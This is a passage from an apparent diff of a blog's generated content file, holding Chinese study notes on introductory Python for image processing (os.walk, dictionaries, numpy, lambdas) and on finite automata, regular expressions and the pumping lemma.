'Ti_powder_single.tif']Alloy_gradient.jpgBSE.tifbubbles.tifcast_iron1.tifcast_iron2.jpgexportedmonalisa.jpgOsteosarcoma_01.tifOsteosarcoma_01_1sigma_blur.tifOsteosarcoma_01_25Sigma_noise.tifOsteosarcoma_01_2sigma_blur.tifOsteosarcoma_01_8bit.ome.tiffOsteosarcoma_01_8bit_salt_pepper.tifOsteosarcoma_01_8bit_salt_pepper_cropped.tifOsteosarcoma_01_small.tifOsteosarcoma_01_transl.tifOsteosarcoma_01_transl_rot.tifsandstone.tifsandstone_blur_2sigma.tifsandstone_low_contrast.tifscratch_time_series.tifsynthetic.jpgTi_powder.tifTi_powder_single.tif
    • 使用 os.walk 遍历文件
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
    # 遍历文件
    for f in files:
    print(os.path.join(root, f))
    <generator object walk at 0x000001AAF06408C8>.\4.ipynb.\Untitled.ipynb.\Untitled1.ipynb.\Untitled2.ipynb.\Untitled3.ipynb.\Untitled4.ipynb.\Untitled5.ipynb.\Untitled6.ipynb.\Untitled7.ipynb.\Untitled8.ipynb.\Untitled9.ipynb.\.ipynb_checkpoints\4-checkpoint.ipynb.\.ipynb_checkpoints\Untitled-checkpoint.ipynb.\.ipynb_checkpoints\Untitled1-checkpoint.ipynb.\.ipynb_checkpoints\Untitled2-checkpoint.ipynb.\.ipynb_checkpoints\Untitled3-checkpoint.ipynb.\.ipynb_checkpoints\Untitled4-checkpoint.ipynb.\.ipynb_checkpoints\Untitled5-checkpoint.ipynb.\.ipynb_checkpoints\Untitled6-checkpoint.ipynb.\.ipynb_checkpoints\Untitled7-checkpoint.ipynb.\.ipynb_checkpoints\Untitled8-checkpoint.ipynb.\.ipynb_checkpoints\Untitled9-checkpoint.ipynb.\images\Alloy_gradient.jpg.\images\BSE.tif.\images\bubbles.tif.\images\cast_iron1.tif.\images\cast_iron2.jpg.\images\monalisa.jpg.\images\Osteosarcoma_01.tif.\images\Osteosarcoma_01_1sigma_blur.tif.\images\Osteosarcoma_01_25Sigma_noise.tif.\images\Osteosarcoma_01_2sigma_blur.tif.\images\Osteosarcoma_01_8bit.ome.tiff.\images\Osteosarcoma_01_8bit_salt_pepper.tif.\images\Osteosarcoma_01_8bit_salt_pepper_cropped.tif.\images\Osteosarcoma_01_small.tif.\images\Osteosarcoma_01_transl.tif.\images\Osteosarcoma_01_transl_rot.tif.\images\sandstone.tif.\images\sandstone_blur_2sigma.tif.\images\sandstone_low_contrast.tif.\images\scratch_time_series.tif.\images\synthetic.jpg.\images\Ti_powder.tif.\images\Ti_powder_single.tif.\images\exported\saved_using_opencv.jpg.\images\exported\saved_using_opencv.tif.\images\exported\saved_using_opencv_8bit.jpg.\images\exported\saved_using_opencv_8bit_RGB.jpg.\images\exported\saved_using_pyplot.jpg.\images\exported\saved_using_skimage.jpg.\images\exported\saved_using_skimage.tif.\images\exported\saved_using_skimage_8bit.tif.\images\exported\saved_using_tifffile.tiff
    • 使用 os.walk 遍历文件夹
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import os

    print(os.walk('.')) # Nothing to see here as this is just a generator

    for root, dirs, files in os.walk('.'):
    # root 表示当前正在访问的文件夹路径
    # dirs 表示该文件夹下的子目录名 list
    # files 表示该文件夹下的文件 list
    # 遍历所有的文件夹
    for d in dirs:
    print(os.path.join(root, d))
    <generator object walk at 0x000001AAF06406C8>.\.ipynb_checkpoints.\images.\images\exported
    ]]>
    @@ -9435,7 +9435,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(1-21)-Python%20Basics/ - 相关资源

    课程

    Tutorial 01 - Why is it important for researchers to learn coding?

    Tutorial 02 - What is digital image processing?

    Tutorial 03 - Image processing in imageJ, ZEN, and APEER

    Tutorial 04 - Appreciating the simplicity of python

    • 使用 Python 给图像添加 Sigma=2 的高斯模糊
    from skimage import io, filters
    from matplotlib import pyplot as plt

    img = io.imread('images/Osteosarcoma_01_25Sigma_noise.tif') # 读取图片
    gaussian_img = filters.gaussian(img, sigma=2) # 添加高斯模糊

    plt.imshow(gaussian_img) # 显示图片

    png

    Tutorial 05 - How to install python using Anaconda

    教你怎么装 Anaconda 和 Spyder…

    Tutorial 06 - Understanding Anaconda Packages

    教你怎么用 Anaconda …

    Tutorial 06b - Understanding python environments (using Anaconda)

    教你怎么管理 Anaconda 环境…

    Tutorial 07 - Getting familiar with spyder IDE

    教你怎么用 Sypder…

    png

    Variable explorer 可以实时显示变量的类型和值?有点意思

    Tutorial 08 - What are libraries in python

    介绍了 Python 中库(library)的概念

    Tutorial 09 - Top 5 python libraries for image analysis

    PyPI · The Python Package Index

    • Image processing
      • scikit-image
      • Opencv-python
    • Data analysis
      • numpy
      • pandas
    • Plotting & visualization
      • matplotlib
    • Other libraries worth mentioning
      • scipy - scientfic and numerical tools, extension of numpy
      • keras / tensorflow - deep learning
      • seaborn and plotly - advanced, highly customizable plotting
      • czifile, tifffile - many other libraries for specific tasks

    Tutorial 10 - Writing your first lines of code in Python

    教你怎么在 Spyder 里写 Python 代码, 算了, 我还是用 Jupyter 吧…

    Tutorial 11 - Operators and basic math in Python

    教你怎么用 Python 里的运算符和基本运算…

    Tutorial 12 - What are Lists in Python

    教你怎么用 Python 里的 list…

    Tutorial 13 - What are Tuples in Python

    教你怎么用 Python 里的 tuple…

    就是个定义以后值不可变的 list…

    Tutorial 14 - What are Dictionaries in Python

    教你怎么用 Python 里的字典…

    Dictionaries: a key and a value

    • 定义字典的 3 种方式:
    life_sciences = {'Botany': 'plants', 
    'Zoology': 'animals',
    'Virology': 'viruses',
    'Cell_biology': 'cells'}
    life_sciences = dict([('Botany', 'plants'),
    ('Zoology', 'animals'),
    ('Virology', 'viruses'),
    ('Cell_biology', 'cells')])
    life_sciences = dict(Botany = 'plants',
    Zoology = 'animals',
    Virology = 'viruses',
    Cell_biology='cells')
    • 判断定义变量的类型
    type(life_sciences)
    dict
    • 查找
    print('Zoology' in life_sciences)
    True
    • 添加元素
    life_sciences['Neuroscience'] = 'nervous_system'
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells', 'Neuroscience': 'nervous_system'}
    • 删除元素
    del life_sciences['Neuroscience']
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells'}
    • 定义字典时只能用 tuple 作 key 而不是 list:
    b = {(1, 0): 'a', (1, 1): 'b', (2, 2): 'c', (3, 2): 'd'}
    c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}
    ---------------------------------------------------------------------------TypeError                                 Traceback (most recent call last)Input In [12], in <cell line: 1>()----> 1 c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}TypeError: unhashable type: 'list'
    • 输出字典的 key
    d = list(life_sciences.keys())
    d
    ['Botany', 'Zoology', 'Virology', 'Cell_biology']
    • 输出字典的 value
    e = list(life_sciences.values())
    e
    ['plants', 'animals', 'viruses', 'cells']

    Tutorial 15 - What are numpy arrays in Python

    教你了解 numpy

    • numpy 与 list 的不同:
    a = [1, 2, 3, 4, 5]
    b = 2 * a
    b
    [1, 2, 3, 4, 5, 1, 2, 3, 4, 5]
    type(a)
    list
    import numpy as np

    c = np.array(a)
    d = 2 * c
    d
    array([ 2,  4,  6,  8, 10])
    type(c)
    numpy.ndarray
    c ** 2
    array([ 1,  4,  9, 16, 25], dtype=int32)
    • 设置数据类型
    import numpy as np

    x = np.array([[1, 2], [3, 4]]) # 整型变量
    y = np.array([[1, 2], [3, 4]], dtype=np.float64) # float
    y/2
    array([[0.5, 1. ],       [1.5, 2. ]])
    • 读取图像, 将图像存储为 numpy 矩阵
    from skimage import io

    img1 = io.imread('images/Osteosarcoma_01.tif')
    type(img1)
    numpy.ndarray
    • 图像(高, 宽, 通道数)
    img1.shape
    (1104, 1376, 3)
    • 创建图像
      • 创建一个值全为 1, 大小和 img1 相同的图像
    a = np.ones_like(img1)
    a.shape
    (1104, 1376, 3)
    • 切片
    import numpy as np

    a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
    np.shape(a)
    (3, 4)
    a
    array([[ 1,  2,  3,  4],       [ 5,  6,  7,  8],       [ 9, 10, 11, 12]])
    a[:2]
    array([[1, 2, 3, 4],       [5, 6, 7, 8]])
    a[:2, 1:3]
    array([[2, 3],       [6, 7]])
    • 求和
    np.sum(a, axis=0)
    array([15, 18, 21, 24])
    np.sum(a, axis=1)
    array([10, 26, 42])
    np.max(a)
    12

    Tutorial 16 - Data types in python

    • Data types:
    类型名称
    Textstr
    Numbersint, float, complex
    Arrays(lists)list, tuple, range
    Mappingdict
    Boolean(True/False)bool
    • For image processing using skimage:
    变量名值域
    uint80 to 255
    uint160 to 65535
    uint320 to 2^32-1
    float-1 to 1 or 0 to 1
    int8-128 to 127
    int16-32768 to 32767
    int32-2^32 to 2^32-1
    • 实例
    from skimage import io, img_as_float

    img = io.imread('images/Osteosarcoma_01.tif')
    img2 = img_as_float(img)

    png

    img.max()
    255
    img2.max()
    1.0

    Tutorial 17 - if and else statements in python

    教你怎么用 Python 里的 if-else…

    Tutorial 18 - while loops in python

    教你怎么用 Python 里的 while 循环…

    Tutorial 19 - for loops in python

    教你怎么用 Python 里的 for 循环…

    通常用于遍历数组里的值

    Tutorial 20 - Functions in Python

    教你怎么用 Python 里的函数 …

    Tutorial 21 - Lambda Functions in Python

    • 普通函数
    def squared(x):
    return x ** 2
    squared(4)
    16
    • lambda 函数
    a = lambda x: x ** 2
    a(5)
    25
    • 使用 lambda 函数
    a = lambda x, y: 2 * x ** 2 + 3 * y
    a(3, 5)
    33
    • lambda 函数和普通函数混合使用
    # S = ut + 1 / 2 a * t ** 2

    def distance_eqn(u, a):
    return lambda t: u * t + ((1 / 2) * a * t ** 2)
    dist = distance_eqn(5, 10)
    dist(20)
    2100.0
    distance_eqn(5, 10)(20)
    2100.0
    ]]>
    + 相关资源

    课程

    Tutorial 01 - Why is it important for researchers to learn coding?

    Tutorial 02 - What is digital image processing?

    Tutorial 03 - Image processing in imageJ, ZEN, and APEER

    Tutorial 04 - Appreciating the simplicity of python

    • 使用 Python 给图像添加 Sigma=2 的高斯模糊
    1
    2
    3
    4
    5
    6
    7
    from skimage import io, filters
    from matplotlib import pyplot as plt

    img = io.imread('images/Osteosarcoma_01_25Sigma_noise.tif') # 读取图片
    gaussian_img = filters.gaussian(img, sigma=2) # 添加高斯模糊

    plt.imshow(gaussian_img) # 显示图片

    png

    Tutorial 05 - How to install python using Anaconda

    教你怎么装 Anaconda 和 Spyder…

    Tutorial 06 - Understanding Anaconda Packages

    教你怎么用 Anaconda …

    Tutorial 06b - Understanding python environments (using Anaconda)

    教你怎么管理 Anaconda 环境…

    Tutorial 07 - Getting familiar with spyder IDE

    教你怎么用 Sypder…

    png

    Variable explorer 可以实时显示变量的类型和值?有点意思

    Tutorial 08 - What are libraries in python

    介绍了 Python 中库(library)的概念

    Tutorial 09 - Top 5 python libraries for image analysis

    PyPI · The Python Package Index

    • Image processing
      • scikit-image
      • Opencv-python
    • Data analysis
      • numpy
      • pandas
    • Plotting & visualization
      • matplotlib
    • Other libraries worth mentioning
      • scipy - scientfic and numerical tools, extension of numpy
      • keras / tensorflow - deep learning
      • seaborn and plotly - advanced, highly customizable plotting
      • czifile, tifffile - many other libraries for specific tasks

    Tutorial 10 - Writing your first lines of code in Python

    教你怎么在 Spyder 里写 Python 代码, 算了, 我还是用 Jupyter 吧…

    Tutorial 11 - Operators and basic math in Python

    教你怎么用 Python 里的运算符和基本运算…

    Tutorial 12 - What are Lists in Python

    教你怎么用 Python 里的 list…

    Tutorial 13 - What are Tuples in Python

    教你怎么用 Python 里的 tuple…

    就是个定义以后值不可变的 list…

    Tutorial 14 - What are Dictionaries in Python

    教你怎么用 Python 里的字典…

    Dictionaries: a key and a value

    • 定义字典的 3 种方式:
    1
    2
    3
    4
    life_sciences = {'Botany': 'plants', 
    'Zoology': 'animals',
    'Virology': 'viruses',
    'Cell_biology': 'cells'}
    1
    2
    3
    4
    life_sciences = dict([('Botany', 'plants'),
    ('Zoology', 'animals'),
    ('Virology', 'viruses'),
    ('Cell_biology', 'cells')])
    1
    2
    3
    4
    life_sciences = dict(Botany = 'plants',
    Zoology = 'animals',
    Virology = 'viruses',
    Cell_biology='cells')
    • 判断定义变量的类型
    1
    type(life_sciences)
    dict
    • 查找
    1
    print('Zoology' in life_sciences)
    True
    • 添加元素
    1
    life_sciences['Neuroscience'] = 'nervous_system'
    1
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells', 'Neuroscience': 'nervous_system'}
    • 删除元素
    1
    del life_sciences['Neuroscience']
    1
    print(life_sciences)
    {'Botany': 'plants', 'Zoology': 'animals', 'Virology': 'viruses', 'Cell_biology': 'cells'}
    • 定义字典时只能用 tuple 作 key 而不是 list:
    1
    b = {(1, 0): 'a', (1, 1): 'b', (2, 2): 'c', (3, 2): 'd'}
    1
    c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}
    ---------------------------------------------------------------------------TypeError                                 Traceback (most recent call last)Input In [12], in <cell line: 1>()----> 1 c = {[1, 0]: 'a', [1, 1]: 'b', [2, 2]: 'c', [3, 2]: 'd'}TypeError: unhashable type: 'list'
    • 输出字典的 key
    1
    2
    d = list(life_sciences.keys())
    d
    ['Botany', 'Zoology', 'Virology', 'Cell_biology']
    • 输出字典的 value
    1
    2
    e = list(life_sciences.values())
    e
    ['plants', 'animals', 'viruses', 'cells']

    Tutorial 15 - What are numpy arrays in Python

    教你了解 numpy

    • numpy 与 list 的不同:
    1
    2
    3
    a = [1, 2, 3, 4, 5]
    b = 2 * a
    b
    [1, 2, 3, 4, 5, 1, 2, 3, 4, 5]
    1
    type(a)
    list
    1
    2
    3
    4
    5
    import numpy as np

    c = np.array(a)
    d = 2 * c
    d
    array([ 2,  4,  6,  8, 10])
    1
    type(c)
    numpy.ndarray
    1
    c ** 2
    array([ 1,  4,  9, 16, 25], dtype=int32)
    • 设置数据类型
    1
    2
    3
    4
    5
    import numpy as np

    x = np.array([[1, 2], [3, 4]]) # 整型变量
    y = np.array([[1, 2], [3, 4]], dtype=np.float64) # float
    y/2
    array([[0.5, 1. ],       [1.5, 2. ]])
    • 读取图像, 将图像存储为 numpy 矩阵
    1
    2
    3
    4
    from skimage import io

    img1 = io.imread('images/Osteosarcoma_01.tif')
    type(img1)
    numpy.ndarray
    • 图像(高, 宽, 通道数)
    1
    img1.shape
    (1104, 1376, 3)
    • 创建图像
      • 创建一个值全为 1, 大小和 img1 相同的图像
    1
    2
    a = np.ones_like(img1)
    a.shape
    (1104, 1376, 3)
    • 切片
    1
    2
    3
    4
    import numpy as np

    a = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]])
    np.shape(a)
    (3, 4)
    1
    a
    array([[ 1,  2,  3,  4],       [ 5,  6,  7,  8],       [ 9, 10, 11, 12]])
    1
    a[:2]
    array([[1, 2, 3, 4],       [5, 6, 7, 8]])
    1
    a[:2, 1:3]
    array([[2, 3],       [6, 7]])
    • 求和
    1
    np.sum(a, axis=0)
    array([15, 18, 21, 24])
    1
    np.sum(a, axis=1)
    array([10, 26, 42])
    1
    np.max(a)
    12

    Tutorial 16 - Data types in python

    • Data types:
    类型名称
    Textstr
    Numbersint, float, complex
    Arrays(lists)list, tuple, range
    Mappingdict
    Boolean(True/False)bool
    • For image processing using skimage:
    变量名值域
    uint80 to 255
    uint160 to 65535
    uint320 to 2^32-1
    float-1 to 1 or 0 to 1
    int8-128 to 127
    int16-32768 to 32767
    int32-2^32 to 2^32-1
    • 实例
    1
    2
    3
    4
    from skimage import io, img_as_float

    img = io.imread('images/Osteosarcoma_01.tif')
    img2 = img_as_float(img)

    png

    1
    img.max()
    255
    1
    img2.max()
    1.0

    Tutorial 17 - if and else statements in python

    教你怎么用 Python 里的 if-else…

    Tutorial 18 - while loops in python

    教你怎么用 Python 里的 while 循环…

    Tutorial 19 - for loops in python

    教你怎么用 Python 里的 for 循环…

    通常用于遍历数组里的值

    Tutorial 20 - Functions in Python

    教你怎么用 Python 里的函数 …

    Tutorial 21 - Lambda Functions in Python

    • 普通函数
    1
    2
    def squared(x):
    return x ** 2
    1
    squared(4)
    16
    • lambda 函数
    1
    2
    a = lambda x: x ** 2
    a(5)
    25
    • 使用 lambda 函数
    1
    2
    a = lambda x, y: 2 * x ** 2 + 3 * y
    a(3, 5)
    33
    • lambda 函数和普通函数混合使用
    1
    2
    3
    4
    # S = ut + 1 / 2 a * t ** 2

    def distance_eqn(u, a):
    return lambda t: u * t + ((1 / 2) * a * t ** 2)
    1
    2
    dist = distance_eqn(5, 10)
    dist(20)
    2100.0
    1
    distance_eqn(5, 10)(20)
    2100.0
    ]]>
    @@ -9514,7 +9514,7 @@ /posts/Theory-%E8%AE%A1%E7%AE%97%E7%90%86%E8%AE%BA%E5%AF%BC%E5%BC%951/ - 第 1 章 正则语言

    将现实计算机中复杂难的问题直接建立易于处理的数学理论——引入计算模型

    • 计算模型(Computational Model)
      • 理想计算机
      • 准绝地刻画了某些特征,同时忽略一些特征。因此,针对关注的特征,采用不同的计算模型。
      • 最简单模型——自动机(Automation)

    1.1 有穷自动机

    • 什么是“有穷自动机”?
      • 描述能力和资源及其有限的计算机模型。
    • 从数学角度考虑“有穷自动机”
      • 只做抽象的描述,不涉及任何具体的应用
      • 接受输入:字符串
      • 输出:是非型
    • 如此有限,能做什么?
      • 很多事情(机电设备核心部位)

    自动门控制器实例:

    png

    ​ 控制器处于CLOSED状态,假设输入如下信号:FRONT,REAR,NEITHER,FRONT,BOTH,NEITHER,REAR,NEITHER,考虑状态的变化。

    ​ 可以给出状态和信号之间的计算。


    png

    • $M_1$ 的状态图
      • 起始状态(start state) $q_1$ 用一个指向它的无出发点的箭头表示。
      • 接收状态(accept state) $q_2$ 带有双圈。
      • 从一个状态指向另一个状态的箭头称为转移
    状态/信号01
    $q_1$$q_1$$q_2$
    $q_2$$q_3$$q_2$
    $q_3$$q_2$$q_2$
    • 当这个自动机接收到输入字符串,例如 1101 时,它处理这个字符串并产生一个输出。输出是接受拒绝
      • 处理从 $M_1$ 的起始状态开始。自动机从左至右一个接一个地接受输入字符串的所有符号。
      • 读到一个符号之后,$M_1$ 沿着标有该符号的转移从一个状态移动到另一个状态。
      • 当读到最后一个符号时,$M_1$ 产生它的输出。
        • 如果 $M_1$ 现在处于一个接受状态,则输出为接受;
        • 否则输出为拒绝。

    用 C 语言描述自动机:

    char *input, *pCurr;
    Bool FA_func()
    {
    start:
    q1: if (*pCurr==0)
    goto q1;
    else if (*pCurr == 1)
    goto q2;
    q2:if (*pCurr == 0)
    goto q3;
    else if (*pCurr == 1)
    goto q2;
    q3:if (*Curr == 0 || *pCurr == 1)
    goto q2;
    };

    自动机对应于只有 if,goto,无数组,无内部变量的程序;

    程序不如图形直观。

    1.1.1 有穷自动机的形式化定义

    • 有穷自动机是一个 5 元组($Q,\Sigma,\delta,q_0,F$)(状字转起接),其中
        1. $Q$ 是一个有穷集合,称为状态集
        2. $\Sigma$ 是一个有穷集合,称为字母表
        3. $\delta:Q\times \Sigma\to Q$ 是转移函数
        4. $q_0\in Q$ 是起始状态
        5. $F\subseteq Q$ 是接收状态集

    png

    可以把 $M_1$ 形式地写成 $M_1=(Q,\Sigma,\delta,q_1,F)$,其中

    ​ 1.$Q={q_1,q_2,q_3}$

    ​ 2.$\Sigma={0,1}$

    ​ 3.$\delta$ 描述为:

    状态/信号01
    $q_1$$q_1$$q_2$
    $q_2$$q_3$$q_2$
    $q_3$$q_2$$q_2$

    ​ 4.$q_1$ 是起始状态。

    ​ 5.$F={q_2}$

    1.1.2 有穷自动机举例

    即,$M_1$ 可用形式化描述为 $M_1=({q_1,q_2},{0,1},\delta,q_1,{q_2})$,转移函数 $\delta$ 为:

    状态/信号01
    $q_1$$q_1$$q_2$
    $q_2$$q_3$$q_2$
    $q_3$$q_2$$q_2$

    形式化描述就是一个 5 元组。


    若 $A$ 是机器 $M$ 接受全部字符串集,则称 $A$ 是机器 $M$ 的语言,记作 $L(M)=A$,又称 $M$ 识别 $A$ 或 $M$ 接受 $A$。(把计算模型语言结合到一起,而语言又可以与问题进行编码,因此就通过语言计算模型问题关联起来)

    $L(M_1)={w|w 至少一个 1 并且在最后的 1 后面有偶数个 0}$

    1.1.3 计算的形式化定义

    形式化定义能够清除在非形式化描述中可能出现的任何二义性。

    ​ 设 $M=(Q,\Sigma,\delta,q_0,F)$ 是一台有穷自动机,$w=w_1 w_2 … w_n$ 是一个字符串并且其中任一 $w_i$ 是字母表 $\Sigma$ 的成员。如果存在 $Q$ 中的状态序列 $r_0,r_1,…,r_n$,满足下述条件:(为了解释自动机如何接受这个字符串)

    • $r_0=q_0$(起始状态吻合)
    • $\delta(r_i,w_{i+1})=r_{i+1},i=0,…,n-1$ (转移函数吻合)
    • $r_n\in F$ (接收状态吻合)

    则 $M$ 接受 $w$。

    ​ 如果 $A={w|M 接受 w}$,则称 $M$ 识别语言 $A$。

    ​ 如果一个语言被一台有穷自动机识别,则称它是正则语言(regular language)。

    1.1.4 设计有穷自动机

    例 1:设计有穷自动机 $E_1$,假设字母表是 ${0,1}$,识别的语言由所有含有奇数个 1 的字符串组成。

    png

    例 2:设计有穷自动机 $E_2$,使其能够识别含有 001 作为字串组成的正则语言。

    png

    1.1.5 正则运算

    ​ 如果一个语言被一台有穷自动机识别,则称它是正则语言(regular language)。

    定义:设 $A$ 和 $B$ 是两个语言,定义正则运算连接星号

    ​ 设字母表 $\Sigma$ 是标准的 26 个字母 ${a,b,…,z}$。又设 $A={good,bad}$,$B={boy,girl}$,则:

    $A\cup B={good,bad,boy,girl}$,

    $A\circ B={goodboy,goodgirl,badboy,badgirl}$

    $A^*={\varepsilon(表示空),good, bad,goodgood,goodbad,badgood,badbad,goodgoodgood,…}$

    ​ 如果把某种运算应用于一个对象集合的成员得到的对象仍在这个集合中,则称这个对象集合在该运算下封闭

    正则语言类在并、连接、星号运算下封闭。

    1.2 非确定性

    • 有穷自动机(Finite Automata)FA

    • 确定型有穷自动机(Deterministic Finite Automata)DFA

    • 非确定型有穷自动机(NonDeterministic Finite Automata)NFA

    ​ 证明定理遇到困难,暂时放下——引入不确定性

    • 确定性:机器处于给定状态并读入下一个输入符,可以知道机器的下一个状态是什么——确定的。
    • 不确定性:任何一个点,下一个状态可能存在若干中选择。体现在:
      • 转换规则——一入多出,
      • $\varepsilon$ 是空字(当前状态($q_2$)不稳定,不用读入输入,自动转到下一个状态($q_3$))——无转入态。

    png

    ​ 设 $A$ 是 ${0,1}$ 上倒数第三个符号为 1 的所有字符串组成的语言,下图 NFA $N_2$ 识别 $A$。

    png

    ​ 让其停留在起始状态 $q_1$,直到它“猜想”它正好位于倒数第三的位置上。

    1.2.1 非确定型有穷自动机的形式化定义

    非确定型有穷自动机是一个 5 元组 $(Q,\Sigma,\delta,q_0,F)$,其中

    • $Q$ 是有穷的状态集
    • $\Sigma$ 是有穷的字母表字母表
    • $\delta:Q\times{\color{red}\Sigma_\varepsilon}\to P(Q)$ 是转移函数(仅在转移函数上与 DFA 不同)。
    • $q_0\in Q$ 是起始状态
    • $F\subseteq Q$ 是接收状态集

    png

    $N_1$ 的形式化描述是 $(Q,\Sigma,\delta,q_1,F)$,其中

    1. $Q={q_1,q_2,q_3,q_4}$;
    2. $\Sigma ={0,1}$;
    3. $\delta$ 由下表给出:
    01$\varepsilon$
    $q_1$${q_1}$${q_1,q_2}$$\varnothing$
    $q_2$${q_3}$$\varnothing$${q_3}$
    $q_3$$\varnothing$${q_4}$$\varnothing$
    $q_4$${q_4}$${q_4}$$\varnothing$
    1. $q_1$ 是起始状态;
    2. $F={q_4}$

    1.2.2 NFA 与 DFA 的等价性

    NFA $\Leftrightarrow $ DFA

    每一台非确定型有穷自动机都等价(识别同样的语言)于某一台确定型有穷自动机。

    一个语言是正则的,当且仅当有一台非确定型有穷自动机识别它。

    png

    为了消除 $\varepsilon$,额外构造状态:

    png

    删除不必要的状态:

    png

    • DFA 机器易算,NFA 人为制造,通常,人造 NFA,让机器把它变成 DFA。
    • 当用并行技术去实现时实际上使用 NFA。
    • 当对有指数个结点的树回溯和搜索(可能这里广度优先比深度优先好),是用 DFA。
    • 对应于 NFA 这样的简单并行程序中可以串行化。

    1.2.3 在正则运算下的封闭性

    正则语言类在并、连接、星号运算下封闭。

    1.3 正则表达式

    可以用正则运算符构造描述语言的表达式,称为正则表达式

    1.3.1 正则表达式的形式化定义

    Python 正则表达式 | 菜鸟教程 (runoob.com)

    称 $R$ 是一个正则表达式,如果 $R$ 是:

    1. $a$,这里 $a$ 是字母表 $\Sigma$ 中的一个元素;
    2. $\varepsilon$;(表示只包含一个字符串——空串的语言,而 $\varnothing$ 表示不包含任何字符串的语言)
    3. $\varnothing$;

    (归纳定义)

    1. $R_1\cup R_2$,这里 $R_1$ 和 $R_2$ 是正则表达式;
    2. $(R_1\circ R_2)$,这里 $R_1$ 和 $R_2$ 是正则表达式;
    3. $(R_1^*)$,这里 $R_1$ 是正则表达式。

    1.3.2 与用穷自动机的等价性

    png

    png

    广义非确定型有穷自动机:GNFA

    • 起始状态有射到其他每一个状态的箭头,但是没有从任何其他状态射入的箭头。(避免死循环)
    • 有唯一的一个接收状态,并且它有从其他每一个状态射入的箭头,但是没有射到任何其他状态的箭头。此外,这个接收状态与起始状态不同。
    • 除起始状态和接收状态外,每一个状态到自身和其他每一个状态都有一个箭头。

    1.4 非正则语言

    任何不能被正则表达式所定义的语言都是非正则语言(Nonregular languges)(无穷个可能)

    关于正则语言的泵引理

    泵引理是形式语言与自动机理论中判定一个语言不是正则语言的重要工具,下面介绍的是其通用的形式,除此之外还有其推广的强泵引理等。

    语言中的所有字符串只要它的长度不小于某个特定值——泵长度,就可以被抽取。

    ——每一个这样的字符串都包括一段字串,把这段字串重复任意次,得到的字符串仍在这个语言中。

    泵引理:若 $A$ 是一个正则语言,则存在一个数 $p$(泵长度)使得,如果 $s$ 是 $A$ 中任一长度不小于 $p$ 的字符串,那么 $s$ 可以被分成 3 段,$s=xyz$,满足下述条件:(随便否定一个,就可以证明不是正则的)

    1. 对每一个 $i\ge 0, xy^iz\in A$($y^i$ 是 $i$ 个 $y$ 连接在一起,$y^0$ 等于 $\varepsilon$)
    2. $|y|>0$(字符串 $y$ 的长度大于 0,换言之,$y\ne \varepsilon$)
    3. $|xy|\le p$($x$ 和 $y$ 两端在一起的长度不超过 $p$)

    我们总能够在离 $s$ 的开始处不太远的地方找到一个非空的串 $y$,然后可以把它看作一个“泵”,重复 $y$ 任意多次,或者去掉它,而所得到的结果串仍然属于 $A$。

    ]]>
    + 第 1 章 正则语言

    将现实计算机中复杂难的问题直接建立易于处理的数学理论——引入计算模型

    • 计算模型(Computational Model)
      • 理想计算机
      • 准绝地刻画了某些特征,同时忽略一些特征。因此,针对关注的特征,采用不同的计算模型。
      • 最简单模型——自动机(Automation)

    1.1 有穷自动机

    • 什么是“有穷自动机”?
      • 描述能力和资源及其有限的计算机模型。
    • 从数学角度考虑“有穷自动机”
      • 只做抽象的描述,不涉及任何具体的应用
      • 接受输入:字符串
      • 输出:是非型
    • 如此有限,能做什么?
      • 很多事情(机电设备核心部位)

    自动门控制器实例:

    png

    ​ 控制器处于CLOSED状态,假设输入如下信号:FRONT,REAR,NEITHER,FRONT,BOTH,NEITHER,REAR,NEITHER,考虑状态的变化。

    ​ 可以给出状态和信号之间的计算。


    png

    • $M_1$ 的状态图
      • 起始状态(start state) $q_1$ 用一个指向它的无出发点的箭头表示。
      • 接收状态(accept state) $q_2$ 带有双圈。
      • 从一个状态指向另一个状态的箭头称为转移
    状态/信号01
    $q_1$$q_1$$q_2$
    $q_2$$q_3$$q_2$
    $q_3$$q_2$$q_2$
    • 当这个自动机接收到输入字符串,例如 1101 时,它处理这个字符串并产生一个输出。输出是接受拒绝
      • 处理从 $M_1$ 的起始状态开始。自动机从左至右一个接一个地接受输入字符串的所有符号。
      • 读到一个符号之后,$M_1$ 沿着标有该符号的转移从一个状态移动到另一个状态。
      • 当读到最后一个符号时,$M_1$ 产生它的输出。
        • 如果 $M_1$ 现在处于一个接受状态,则输出为接受;
        • 否则输出为拒绝。

    用 C 语言描述自动机:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    char *input, *pCurr;
    Bool FA_func()
    {
    start:
    q1: if (*pCurr==0)
    goto q1;
    else if (*pCurr == 1)
    goto q2;
    q2:if (*pCurr == 0)
    goto q3;
    else if (*pCurr == 1)
    goto q2;
    q3:if (*Curr == 0 || *pCurr == 1)
    goto q2;
    };

    自动机对应于只有 if,goto,无数组,无内部变量的程序;

    程序不如图形直观。

    1.1.1 有穷自动机的形式化定义

    • 有穷自动机是一个 5 元组($Q,\Sigma,\delta,q_0,F$)(状字转起接),其中
        1. $Q$ 是一个有穷集合,称为状态集
        2. $\Sigma$ 是一个有穷集合,称为字母表
        3. $\delta:Q\times \Sigma\to Q$ 是转移函数
        4. $q_0\in Q$ 是起始状态
        5. $F\subseteq Q$ 是接收状态集

    png

    可以把 $M_1$ 形式地写成 $M_1=(Q,\Sigma,\delta,q_1,F)$,其中

    ​ 1.$Q={q_1,q_2,q_3}$

